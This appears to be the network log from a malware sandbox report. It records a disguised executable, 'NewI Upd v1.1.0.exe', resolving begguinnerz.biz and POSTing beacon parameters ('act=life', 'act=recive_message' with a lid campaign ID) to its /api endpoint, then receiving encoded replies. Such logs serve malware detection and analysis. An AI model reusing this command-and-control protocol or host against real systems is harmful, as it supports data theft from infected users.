                                                                                Dec 27, 2024 03:03:13.331566095 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.375619888 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.375647068 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.422460079 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.432549953 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.485008001 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.485027075 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.521940947 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.522015095 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.522026062 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.522043943 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.522125006 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.522444010 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.522458076 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.522468090 CET49889443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.522473097 CET44349889172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.753925085 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.753979921 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:13.754064083 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.754460096 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:13.754478931 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:15.056703091 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:15.056791067 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:15.060503006 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:15.060508966 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:15.060720921 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:15.064353943 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:15.064610004 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:15.064631939 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:15.065102100 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:15.065108061 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:16.071022987 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:16.071110010 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:16.071176052 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:16.071353912 CET49895443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:16.071367979 CET44349895172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:16.146555901 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:16.146600008 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:16.146677017 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:16.146924973 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:16.146936893 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:17.384973049 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:17.385054111 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:17.386250019 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:17.386256933 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:17.386477947 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:17.387754917 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:17.387887955 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:17.387914896 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:18.155172110 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:18.155281067 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:18.155395985 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:18.155673981 CET49902443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:18.155682087 CET44349902172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:18.347497940 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:18.347531080 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:18.347609043 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:18.347975016 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:18.347990990 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:19.610692024 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:19.610770941 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:19.612443924 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:19.612458944 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:19.612786055 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:19.614218950 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:19.614365101 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:19.614403009 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:19.614464045 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:19.614474058 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:20.580203056 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:20.580292940 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:20.580353975 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:20.580534935 CET49907443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:20.580547094 CET44349907172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:21.136850119 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:21.136876106 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:21.136955976 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:21.137290001 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:21.137300014 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:22.349209070 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:22.349273920 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:22.351037979 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:22.351043940 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:22.351255894 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:22.352888107 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:22.353003979 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:22.353007078 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:23.080720901 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:23.080815077 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:23.080925941 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:23.082022905 CET49914443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:23.082040071 CET44349914172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:23.162425041 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:23.162461042 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:23.162565947 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:23.162959099 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:23.162966967 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:24.432986975 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:24.433080912 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:24.434259892 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:24.434268951 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:24.434501886 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:24.445975065 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:24.446049929 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:24.446054935 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:25.852410078 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:25.852502108 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:25.852610111 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:25.852715969 CET49920443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:25.852729082 CET44349920172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:25.896312952 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:25.896337986 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:25.896408081 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:25.896707058 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:25.896719933 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:27.179846048 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:27.179953098 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:27.180963039 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:27.180969000 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:27.181178093 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:27.182189941 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:27.182220936 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:27.182260990 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:27.935921907 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:27.936026096 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:27.936085939 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:27.936492920 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:27.936511040 CET44349926172.67.190.223192.168.2.4
                                                                                Dec 27, 2024 03:03:27.936522961 CET49926443192.168.2.4172.67.190.223
                                                                                Dec 27, 2024 03:03:27.936527967 CET44349926172.67.190.223192.168.2.4
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 27, 2024 03:03:08.788070917 CET5537853192.168.2.41.1.1.1
                                                                                Dec 27, 2024 03:03:09.097109079 CET53553781.1.1.1192.168.2.4
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 27, 2024 03:03:08.788070917 CET192.168.2.41.1.1.10x76e2Standard query (0)begguinnerz.bizA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 27, 2024 03:03:09.097109079 CET1.1.1.1192.168.2.40x76e2No error (0)begguinnerz.biz172.67.190.223A (IP address)IN (0x0001)false
                                                                                Dec 27, 2024 03:03:09.097109079 CET1.1.1.1192.168.2.40x76e2No error (0)begguinnerz.biz104.21.92.91A (IP address)IN (0x0001)false
                                                                                • begguinnerz.biz
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449883172.67.190.2234436648C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 02:03:10 UTC262OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 8
                                                                                Host: begguinnerz.biz
                                                                                2024-12-27 02:03:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                Data Ascii: act=life
                                                                                2024-12-27 02:03:11 UTC1125INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 02:03:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=6bv0a7f8qhc0o389kt96fphl4f; expires=Mon, 21 Apr 2025 19:49:49 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkCNyTrh0vYy%2FQzMrKhJHFjYpVXLsirmpcIned%2FvBnJMGS1whZgHXPomcM6tIoit22OOJes2Ai%2BJz2m7Z%2BcWNqlQHqLQYzwFc4UDVGTE7C2lkR0c7edozxV6ErAUhBla2F0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f85bb90194f333c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1819&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1378008&cwnd=229&unsent_bytes=0&cid=8f14dfe795cc451a&ts=785&x=0"
                                                                                2024-12-27 02:03:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                Data Ascii: 2ok
                                                                                2024-12-27 02:03:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449889172.67.190.2234436648C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 02:03:12 UTC263OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 86
                                                                                Host: begguinnerz.biz
                                                                                2024-12-27 02:03:12 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                2024-12-27 02:03:13 UTC1133INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 02:03:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=tacntpsd5h4846tnr3rcqc5b98; expires=Mon, 21 Apr 2025 19:49:52 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NW%2BQ4tQ1%2Fyu9vPA8077kIWi%2FPHxMcZmt1c%2Fokck%2BoaMAFL58qp1DenboH1xMiuHLUEvuuf2t52AM2FRPe70wMiDJASZ%2FvUioU%2B6KHft5H7kEmSSj596wsDuF%2BJnQfUpAXZo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f85bb9d0931f795-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1497&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=985&delivery_rate=1898569&cwnd=187&unsent_bytes=0&cid=73884a237f26d46f&ts=797&x=0"
                                                                                2024-12-27 02:03:13 UTC236INData Raw: 34 36 61 0d 0a 49 57 68 42 6f 64 4b 55 51 4b 35 59 39 4b 78 58 68 6a 76 6a 4a 79 58 67 59 43 54 78 38 41 77 54 6b 39 55 47 6a 75 32 39 45 63 4a 61 53 6a 65 44 36 4b 42 73 6a 43 75 52 6a 6d 33 67 57 6f 39 55 51 4d 78 43 52 5a 58 53 4e 6e 58 79 75 58 58 72 77 5a 39 6e 72 77 4e 53 4a 38 43 2b 35 79 57 43 65 70 48 55 64 62 78 67 6d 41 56 41 6a 6b 49 65 30 35 56 6d 63 66 4b 35 5a 4f 2b 47 30 6d 47 75 51 67 41 74 78 72 72 78 49 38 6f 35 6d 4d 45 79 34 31 36 43 54 55 75 4a 44 55 79 63 30 69 41 78 39 71 38 6b 74 4d 2f 77 64 4c 5a 41 4a 53 44 53 75 62 59 39 67 69 50 57 79 54 6d 6b 41 63 46 47 51 49 49 4d 51 70 57 62 5a 48 76 37 73 57 58 71 68 38 31 34 70 45 6b 41 49 38 57 37 2b 79 72 65 4e 4a 4c 47 4f 65 56
                                                                                Data Ascii: 46aIWhBodKUQK5Y9KxXhjvjJyXgYCTx8AwTk9UGju29EcJaSjeD6KBsjCuRjm3gWo9UQMxCRZXSNnXyuXXrwZ9nrwNSJ8C+5yWCepHUdbxgmAVAjkIe05VmcfK5ZO+G0mGuQgAtxrrxI8o5mMEy416CTUuJDUyc0iAx9q8ktM/wdLZAJSDSubY9giPWyTmkAcFGQIIMQpWbZHv7sWXqh814pEkAI8W7+yreNJLGOeV
                                                                                2024-12-27 02:03:13 UTC901INData Raw: 55 67 67 55 4a 77 67 56 65 30 38 6f 75 49 73 4f 30 64 66 32 61 30 6d 4f 6d 41 78 56 74 32 76 44 78 4c 6f 78 69 31 73 59 35 36 6c 79 43 53 6b 43 44 41 6c 53 63 6b 6d 31 35 2b 62 4e 75 34 34 44 51 66 61 70 45 41 69 72 45 76 2f 45 71 79 6a 57 56 6a 6e 75 6b 58 70 6b 46 48 38 49 69 56 70 43 52 65 6e 7a 67 39 33 75 69 6c 70 39 30 72 41 4e 53 59 38 57 2b 39 79 2f 4d 4b 4a 37 46 50 75 46 4c 69 6b 78 4b 6a 77 4a 4c 6d 5a 31 74 63 66 61 39 62 75 4f 46 32 33 36 74 52 51 6f 6a 67 2f 36 32 4a 64 52 36 7a 6f 34 57 34 55 6d 47 53 56 48 41 4f 41 61 4d 33 48 63 78 39 72 73 6b 74 4d 2f 58 64 71 4e 41 41 53 7a 41 75 50 30 77 7a 43 69 51 77 7a 44 32 58 34 52 4c 54 59 45 51 54 4a 32 55 62 58 6a 36 76 6d 48 72 69 35 38 39 34 45 51 53 59 35 76 77 31 79 2f 48 4e 70 7a 5a 4e 61
                                                                                Data Ascii: UggUJwgVe08ouIsO0df2a0mOmAxVt2vDxLoxi1sY56lyCSkCDAlSckm15+bNu44DQfapEAirEv/EqyjWVjnukXpkFH8IiVpCRenzg93uilp90rANSY8W+9y/MKJ7FPuFLikxKjwJLmZ1tcfa9buOF236tRQojg/62JdR6zo4W4UmGSVHAOAaM3Hcx9rsktM/XdqNAASzAuP0wzCiQwzD2X4RLTYEQTJ2UbXj6vmHri5894EQSY5vw1y/HNpzZNa
                                                                                2024-12-27 02:03:13 UTC1369INData Raw: 33 65 61 32 0d 0a 42 45 6a 41 78 42 68 64 4a 78 50 2b 6a 33 59 2b 44 50 68 7a 4f 75 54 67 45 76 78 4c 6e 33 49 63 77 77 6d 4d 45 2f 37 46 47 42 53 45 61 4a 43 6b 43 65 6d 57 46 2b 39 72 39 6e 34 49 72 53 63 4f 41 4e 53 69 54 62 38 4b 35 69 36 54 53 56 33 79 53 6d 62 49 4a 4c 53 59 55 55 42 6f 7a 63 64 7a 48 32 75 79 53 30 7a 39 56 30 70 30 63 48 4b 63 43 30 38 69 2f 44 4d 35 2f 48 4a 2b 35 56 6a 31 64 4b 69 41 64 49 6e 35 64 68 63 66 43 32 61 75 61 45 6e 7a 33 67 52 42 4a 6a 6d 2f 44 5a 4c 39 77 6f 6e 4d 55 6b 70 6d 79 43 53 30 6d 46 46 41 61 4d 33 48 63 78 39 72 73 6b 74 4d 2f 55 64 61 78 50 43 69 58 52 76 76 6b 77 78 69 69 53 77 44 48 6f 56 34 68 49 53 49 63 51 51 70 4f 41 62 33 54 32 75 57 6e 2b 69 70 38 39 34 45 51 53 59 35 76 77 7a 42 62 4c 4b 6f 66
                                                                                Data Ascii: 3ea2BEjAxBhdJxP+j3Y+DPhzOuTgEvxLn3IcwwmME/7FGBSEaJCkCemWF+9r9n4IrScOANSiTb8K5i6TSV3ySmbIJLSYUUBozcdzH2uyS0z9V0p0cHKcC08i/DM5/HJ+5Vj1dKiAdIn5dhcfC2auaEnz3gRBJjm/DZL9wonMUkpmyCS0mFFAaM3Hcx9rsktM/UdaxPCiXRvvkwxiiSwDHoV4hISIcQQpOAb3T2uWn+ip894EQSY5vwzBbLKof
                                                                                2024-12-27 02:03:13 UTC1369INData Raw: 59 46 47 56 6f 56 43 43 4e 4f 63 61 48 47 78 37 33 4c 38 6d 4e 68 73 37 6c 70 4b 4a 4d 2f 77 72 6d 4c 47 4b 4a 50 41 4d 65 35 63 68 55 6c 4e 67 67 64 55 6d 35 52 70 66 66 6d 79 61 2b 71 4b 30 6e 53 72 51 42 67 78 77 4c 54 34 4c 6f 78 30 31 73 6b 74 70 41 48 42 59 46 43 42 45 6b 43 51 30 6e 45 2f 36 50 64 6a 34 4d 2b 48 4d 36 42 4e 42 69 6a 45 75 2f 30 6d 79 44 71 62 78 54 76 71 55 49 31 4e 53 34 55 51 53 35 61 61 5a 48 6a 30 75 32 6e 76 6e 64 78 79 34 41 31 4b 4a 4e 76 77 72 6d 4c 72 43 61 48 74 64 66 73 58 6d 41 56 41 6a 6b 49 65 30 35 4e 6d 64 76 2b 7a 64 75 4b 64 30 58 53 67 52 51 49 72 78 4c 7a 34 4c 4e 34 79 6c 38 34 37 36 31 47 49 51 55 61 47 42 6b 71 55 30 69 41 78 39 71 38 6b 74 4d 2f 33 63 4c 70 5a 53 41 33 49 73 50 45 79 32 69 48 57 30 58 76 39
                                                                                Data Ascii: YFGVoVCCNOcaHGx73L8mNhs7lpKJM/wrmLGKJPAMe5chUlNggdUm5Rpffmya+qK0nSrQBgxwLT4Lox01sktpAHBYFCBEkCQ0nE/6Pdj4M+HM6BNBijEu/0myDqbxTvqUI1NS4UQS5aaZHj0u2nvndxy4A1KJNvwrmLrCaHtdfsXmAVAjkIe05Nmdv+zduKd0XSgRQIrxLz4LN4yl84761GIQUaGBkqU0iAx9q8ktM/3cLpZSA3IsPEy2iHW0Xv9
                                                                                2024-12-27 02:03:13 UTC1369INData Raw: 65 64 54 46 2f 54 6c 57 49 78 71 66 64 70 2f 6f 37 61 59 61 52 4d 41 54 48 49 74 76 59 6e 33 6a 32 61 78 44 72 6e 55 59 78 47 54 35 41 43 53 35 4f 41 66 48 66 36 75 53 53 69 7a 39 68 72 34 42 74 4b 45 74 53 37 74 6a 32 43 49 39 62 4a 4f 61 51 42 77 55 5a 4e 6a 77 78 55 6c 35 52 6c 63 76 2b 2f 59 65 53 4c 31 58 36 76 53 41 41 71 79 37 44 35 4a 38 51 78 6b 4d 41 30 34 6c 57 4d 42 51 6e 43 42 56 37 54 79 69 35 57 36 37 70 69 2b 35 37 71 64 4b 41 53 53 6a 79 4e 71 62 59 6c 77 48 72 4f 6a 6a 6a 6f 55 34 78 41 51 34 6f 46 52 5a 4b 65 61 6e 7a 38 73 32 33 6f 69 73 31 68 70 6b 30 4b 4c 4d 32 2f 2b 6a 44 43 50 35 62 43 64 61 6f 5a 68 6c 30 48 32 6b 4a 33 68 4a 49 75 62 72 2b 75 4a 4f 75 44 6e 79 76 67 54 41 63 78 7a 37 2f 32 49 38 38 2b 6e 63 6b 7a 34 6c 69 43 51
                                                                                Data Ascii: edTF/TlWIxqfdp/o7aYaRMATHItvYn3j2axDrnUYxGT5ACS5OAfHf6uSSiz9hr4BtKEtS7tj2CI9bJOaQBwUZNjwxUl5Rlcv+/YeSL1X6vSAAqy7D5J8QxkMA04lWMBQnCBV7Tyi5W67pi+57qdKASSjyNqbYlwHrOjjjoU4xAQ4oFRZKeanz8s23ois1hpk0KLM2/+jDCP5bCdaoZhl0H2kJ3hJIubr+uJOuDnyvgTAcxz7/2I88+nckz4liCQ
                                                                                2024-12-27 02:03:13 UTC1369INData Raw: 4b 30 38 6f 75 65 76 6d 34 64 75 6d 47 31 33 65 70 51 77 34 70 7a 72 66 32 4a 38 45 2f 6b 73 41 78 34 31 6d 4e 53 6b 43 4b 44 55 4b 54 6e 53 34 2f 73 62 42 38 72 4e 65 66 55 36 74 56 4b 79 33 49 6f 72 59 39 67 69 50 57 79 54 6d 6b 41 63 46 4c 54 6f 4d 4b 53 4a 2b 61 61 6d 50 78 76 47 33 6a 6a 74 42 7a 6f 30 49 41 4b 39 47 32 39 69 6e 45 50 5a 37 4b 4f 2f 5a 59 6a 67 55 4a 77 67 56 65 30 38 6f 75 51 4f 65 77 59 2b 50 4e 39 6e 53 37 51 67 41 67 79 4c 79 32 50 59 49 6a 31 73 6b 35 70 41 48 42 53 45 75 50 42 6c 53 66 6b 6d 35 34 39 72 31 32 34 34 44 53 63 4b 42 47 47 43 4c 52 76 2f 30 6e 7a 7a 36 5a 77 54 6e 73 55 38 45 4c 42 34 55 61 42 73 76 53 51 6e 4c 67 76 53 62 4c 6c 63 6c 30 72 46 49 42 4c 73 2f 77 36 57 7a 56 65 70 48 43 64 62 77 5a 67 55 52 4b 6b 41
                                                                                Data Ascii: K08ouevm4dumG13epQw4pzrf2J8E/ksAx41mNSkCKDUKTnS4/sbB8rNefU6tVKy3IorY9giPWyTmkAcFLToMKSJ+aamPxvG3jjtBzo0IAK9G29inEPZ7KO/ZYjgUJwgVe08ouQOewY+PN9nS7QgAgyLy2PYIj1sk5pAHBSEuPBlSfkm549r1244DScKBGGCLRv/0nzz6ZwTnsU8ELB4UaBsvSQnLgvSbLlcl0rFIBLs/w6WzVepHCdbwZgURKkA
                                                                                2024-12-27 02:03:13 UTC1369INData Raw: 49 44 48 67 73 48 57 73 31 38 6c 6a 74 30 51 56 62 64 72 77 38 53 36 4d 59 74 62 46 4f 75 70 55 69 6b 46 4f 68 77 70 46 6c 70 64 6b 66 66 32 32 62 4f 57 46 32 6e 61 6d 53 51 6b 74 7a 4c 48 36 4a 73 55 30 6e 34 35 37 70 46 36 5a 42 52 2f 43 4e 46 61 55 69 6d 4e 68 73 34 56 6e 2f 5a 37 4b 66 72 42 46 53 41 7a 41 76 50 55 6e 79 79 72 57 30 58 76 39 47 59 5a 4a 42 39 70 43 52 70 65 65 62 58 62 2f 75 47 6e 6a 69 4e 52 38 71 6b 30 59 4c 4d 61 34 2b 69 72 42 4b 4a 7a 45 4a 2b 31 51 6a 45 74 50 6b 41 45 47 33 64 4a 70 61 62 48 76 4a 4e 36 46 33 48 2b 32 54 67 56 6a 33 50 37 76 59 73 73 32 31 70 5a 31 39 6b 75 42 54 6b 65 46 44 46 53 53 6d 6d 46 37 38 62 46 76 35 6f 7a 57 64 36 35 4b 44 43 4c 4f 73 66 63 69 79 54 71 66 33 44 69 6b 46 38 46 43 58 38 4a 61 42 71 53
